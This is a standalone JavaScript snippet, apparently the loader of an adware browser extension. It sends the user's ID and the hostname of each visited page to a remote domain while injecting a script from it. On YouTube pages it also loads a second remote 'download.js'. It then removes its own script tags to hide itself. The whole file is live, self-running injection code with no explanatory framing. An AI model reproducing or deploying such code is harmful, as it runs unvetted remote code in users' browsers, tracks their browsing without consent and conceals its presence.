void function(){if(window.self!==window.top)return;var pid='icb38',uid='3d80f46c-ae5b-49cd-b931-74acfb1229ad',osid='7264',ts=1465494092323,h=0,aff=1,appid='icb38-7264-1465494092323-3d80f46c-ae5b-49cd-b931-74acfb1229ad';var extadActive = 1;//(Date.now() - ts > 7200000) ? 1 : 0;
inject('//msmdzbsyrw.org/app/noext/main.php?pid=' + pid + '&eid=2&uid=' + uid + '&host=' + location.hostname + '&active=' + extadActive + '&extad_init=' + (window.EXTADinit ? 1 : 0)+'&h='+h+'&ts='+ts+'&aff='+aff+'&appid='+appid);
location.hostname === 'www.youtube.com' && inject('https://www.u-bar.org/js/download.js');
removeSelf();
function removeSelf() {
  var scr=document.getElementById('ubar-loader')||document.getElementById('videoplugin-loader');
  scr&&tryToRemove(scr);
}
function inject(src){
  var scr=document.createElement('script');
  scr.src=src;
  scr.onload=scr.onerror=function(){setTimeout(function(){tryToRemove(scr)},0)};
  document.body.appendChild(scr);
}
function tryToRemove(node){try{node.parentNode.removeChild(node)}catch(ex){}}
}();
